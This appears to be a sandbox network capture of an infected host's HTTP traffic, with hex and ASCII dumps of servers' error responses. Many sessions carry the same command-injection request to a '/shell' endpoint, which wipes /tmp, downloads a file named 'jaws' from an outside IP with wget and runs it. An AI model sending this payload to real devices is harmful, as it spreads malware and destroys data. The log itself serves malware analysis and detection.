                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000
                                                          Jan 2, 2024 06:25:25.328891039 CET1286INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20
                                                          Data Ascii: ; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-siz
                                                          Jan 2, 2024 06:25:25.328902006 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                          Data Ascii: <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpag
                                                          Jan 2, 2024 06:25:25.328911066 CET18INData Raw: 68 74 6d 6c 3e 0a
                                                          Data Ascii: html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          546192.168.2.2338972209.240.113.20380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.193435907 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.436887980 CET443INHTTP/1.1 404 Not Found
                                                          Server: micro_httpd
                                                          Cache-Control: no-cache
                                                          Date: Tue, 02 Jan 2024 00:25:24 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 75 74 69 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 6f 6e 4c 6f 61 64 3d 27 6c 6f 67 6f 75 74 32 28 29 27 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><script language="javascript" src="util.js"></script></HEAD><BODY onLoad='logout2()' BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          547192.168.2.2359544149.155.143.6280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.272485018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          548192.168.2.2347612111.87.115.15380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.281636000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.537817955 CET427INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Server: Apache
                                                          Vary: Accept-Encoding
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          549192.168.2.235453862.244.41.14780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.284301996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.560585976 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          550192.168.2.235321277.223.119.15080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.284667969 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.543459892 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:23 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          551192.168.2.235344077.242.107.19680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.327512980 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.633570910 CET242INHTTP/1.0 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 113
                                                          Date: Tue, 02 Jan 2024 05:25:04 GMT
                                                          Expires: 0
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          552192.168.2.2341360203.198.100.11380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.334124088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.642741919 CET414INHTTP/1.1 302 Moved Temporarily
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 138
                                                          Location: http://127.0.0.1/?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Connection: keep-alive
                                                          Keep-Alive: timeout=20
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          553192.168.2.233430423.50.91.16980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.361155987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:25.696671009 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 64 36 32 63 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 32 35 26 23 34 36 3b 31 38 66 63 33 30 61 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;12d62c17&#46;1704173125&#46;18fc30a2</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          554192.168.2.23455185.201.189.18180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.755860090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:26.291274071 CET471INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Date: Tue, 02 Jan 2024 05:25:26 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          555192.168.2.2346168110.161.237.5780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.756166935 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:26.566077948 CET16INHTTP/1.0 404


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          556192.168.2.2341330178.128.227.10980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.911067963 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:26.065953016 CET496INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:25 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 302
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 65 6d 70 63 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at empcan.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          557192.168.2.235129218.223.213.8980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:25.918831110 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          558192.168.2.2340292157.90.166.580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:26.148693085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:26.386401892 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:26 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


